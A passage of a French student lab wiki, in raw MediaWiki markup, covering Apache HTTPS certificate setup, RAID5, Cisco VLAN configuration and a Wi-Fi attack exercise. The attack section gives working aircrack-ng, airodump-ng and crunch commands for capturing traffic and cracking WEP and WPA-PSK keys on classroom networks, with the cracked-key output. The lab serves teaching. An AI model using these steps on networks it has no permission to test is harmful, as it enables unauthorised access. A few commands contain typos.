|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
